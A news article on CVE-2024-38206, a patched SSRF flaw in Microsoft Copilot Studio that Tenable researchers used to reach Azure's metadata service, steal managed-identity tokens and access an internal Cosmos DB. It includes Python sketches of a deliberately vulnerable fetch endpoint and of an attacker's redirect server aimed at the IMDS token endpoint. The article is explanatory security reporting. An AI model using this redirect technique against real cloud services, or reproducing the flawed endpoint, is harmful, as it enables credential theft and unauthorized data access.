Microsoft Copilot Studio exploit leaks sensitive cloud data

Researchers have exploited a vulnerability in Microsoft’s Copilot Studio tool, allowing them to make external HTTP requests that could access sensitive information about internal services within a cloud environment, potentially impacting multiple tenants.

Tenable researchers discovered the server-side request forgery (SSRF) flaw in the chatbot creation tool and exploited it to gain access to Microsoft’s internal infrastructure, including the Instance Metadata Service (IMDS) and internal Cosmos DB instances, they revealed in a blog post this week.

Tracked by Microsoft as CVE-2024-38206, the flaw allows an authenticated attacker to bypass SSRF protection in Microsoft Copilot Studio and leak sensitive cloud-based information over a network, according to a security advisory for the vulnerability. The flaw arises when an HTTP request that can be made using the tool is combined with an SSRF protection bypass, Tenable said.

“An SSRF vulnerability exists when an attacker can manipulate the application to make server-side HTTP requests to unexpected destinations or in unexpected ways,” Tenable security researcher Evan Grant explained in the post.
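To make that concrete, here is a minimal sketch of the pattern Grant describes, assuming a hypothetical server-side “fetch” endpoint (this is illustrative Python, not Copilot Studio code): the service retrieves a caller-supplied URL and guards it with a naive hostname blocklist, the kind of check that often passes for SSRF protection.

```python
# Hypothetical SSRF-prone endpoint: fetches a caller-supplied URL
# server-side. Names and the blocklist are invented for this sketch.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from urllib.request import urlopen

# Naive "SSRF protection": refuse obviously internal hostnames.
BLOCKED_HOSTS = {"169.254.169.254", "localhost", "127.0.0.1"}

class FetchHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        target = parse_qs(urlparse(self.path).query).get("url", [""])[0]
        # The check runs only against the URL the caller supplied...
        if urlparse(target).hostname in BLOCKED_HOSTS:
            self.send_error(403, "blocked")
            return
        # ...but urlopen follows redirects on its own, and the final
        # destination is never re-checked against the blocklist.
        body = urlopen(target, timeout=5).read()
        self.send_response(200)
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8000), FetchHandler).serve_forever()
```

The gap flagged in the comments, a filter that validates the requested URL while the HTTP client silently follows redirects to unvalidated destinations, is the same class of weakness Tenable went on to exploit.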

The researchers used their exploit to craft HTTP requests that accessed cloud data and services from multiple tenants. They found that “while no cross-tenant information appeared to be directly accessible, the infrastructure used for this Copilot Studio service was shared between tenants,” Grant wrote.

Any impact to that infrastructure could therefore affect multiple customers, he explained. “While we don’t know the extent to which read/write access to this infrastructure could have an impact, it’s clear that the risk is greater because it’s shared across tenants,” Grant said. The researchers also found that they could use their exploit to gain unrestricted access to other internal hosts on the local subnet their instance was on.

Microsoft responded quickly to Tenable’s report, and the flaw has since been fully patched. No action was required for Copilot Studio users, the company said in its security advisory.

How the CVE-2024-38206 vulnerability works

Microsoft released Copilot Studio late last year as an easy-to-use, drag-and-drop tool for building custom artificial intelligence (AI) assistants, also known as chatbots. These conversational applications let people perform a variety of large language model (LLM) and generative AI tasks using data ingested from within the Microsoft 365 environment, or other data available through the Power Platform on which the tool is built.

The first release of Copilot Studio was recently flagged as having “way too many permissions” by security researcher Michael Bargury at this year’s Black Hat conference in Las Vegas; he found 15 vulnerabilities in the tool that could allow the creation of flawed chatbots.

Tenable researchers discovered the tool’s SSRF flaw while looking for SSRF vulnerabilities in Microsoft’s Azure AI Studio and Azure ML Studio APIs, which the company flagged and patched before the researchers could report them. The researchers then turned their attention to Copilot Studio to see if it could be exploited in a similar way.

Using HTTP requests to access the cloud

When creating a new Copilot, people can define Topics, which let them specify key phrases that a user can say to the Copilot to trigger a specific response or action from the AI; one of the actions that can be performed via a Topic is an HTTP request. Most modern apps that deal with data analytics or machine learning can make such requests because they need to integrate data from external services; the downside is that this can create a potential vulnerability, Grant noted.
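To illustrate why that matters, the toy runtime below mimics what such an action amounts to; the topic schema and the internal URL are invented for this sketch and are not Copilot Studio’s real format. The key point is that the request is issued from the service’s own infrastructure, with that infrastructure’s network vantage point, not from the end user’s browser.

```python
# Illustrative only: a toy "topic" runtime. The schema is invented
# for this sketch and is not Copilot Studio's actual topic format.
import urllib.request

topic = {
    "trigger_phrases": ["check inventory"],
    "actions": [
        # The bot maker picks this URL; a hostile or careless choice
        # can point at hosts only the service's network can reach.
        {"type": "http_request", "method": "GET",
         "url": "http://internal-service.local/status"},  # hypothetical host
    ],
}

def handle_utterance(utterance: str) -> str:
    """Match a trigger phrase, then run the topic's actions server-side."""
    if any(p in utterance.lower() for p in topic["trigger_phrases"]):
        for action in topic["actions"]:
            if action["type"] == "http_request":
                req = urllib.request.Request(action["url"], method=action["method"])
                with urllib.request.urlopen(req, timeout=5) as resp:
                    return resp.read().decode(errors="replace")
    return "No matching topic."

print(handle_utterance("Please check inventory"))
```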

The researchers attempted to gain access to various cloud resources by applying common SSRF protection bypass techniques to the HTTP requests the tool could make. While many requests returned System Error responses, they eventually pointed a request at a server they controlled and had it answer with a 301 redirect response aimed at the restricted hosts they had previously tried to reach. Through trial and error, using a combination of redirects and SSRF bypasses, the researchers were able to retrieve managed identity access tokens from the IMDS and use them to access internal cloud resources, such as Azure services and a Cosmos DB instance. They also exploited the flaw to gain read/write access to that database.
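The redirect step can be sketched in a few lines, assuming a setup like the one described above: the attacker aims the tool’s HTTP request action at a host they control, which answers with a 301 pointing at the IMDS token endpoint. The path and query string below follow Azure’s documented IMDS API; everything else, including the port, is hypothetical.

```python
# Sketch of an attacker-controlled redirect server. The SSRF filter
# approves the attacker's (allowed) hostname; the fetching client then
# follows this redirect to a host it would have refused directly.
from http.server import BaseHTTPRequestHandler, HTTPServer

# Azure's documented IMDS endpoint for managed-identity access tokens.
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectHandler).serve_forever()
```

Note that IMDS normally also expects a “Metadata: true” request header, so reaching it takes more than the redirect alone; the trial and error Grant describes covers gaps like this one. The essential trick, though, is that the blocklist never evaluates 169.254.169.254: it approves the attacker’s hostname, and the HTTP client follows the Location header on its own.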

While the investigation was inconclusive about the full extent to which the flaw could have been exploited to access sensitive cloud data, it was serious enough to warrant immediate action. Indeed, the existence of the SSRF flaw should serve as a cautionary tale for Copilot Studio users: attackers could abuse the HTTP request functionality to escalate their access to cloud data and resources.

“If an attacker can control the targets of those requests, they can forward the request to a sensitive internal resource that the server application has access to even if the attacker does not, potentially exposing sensitive information,” Grant warned.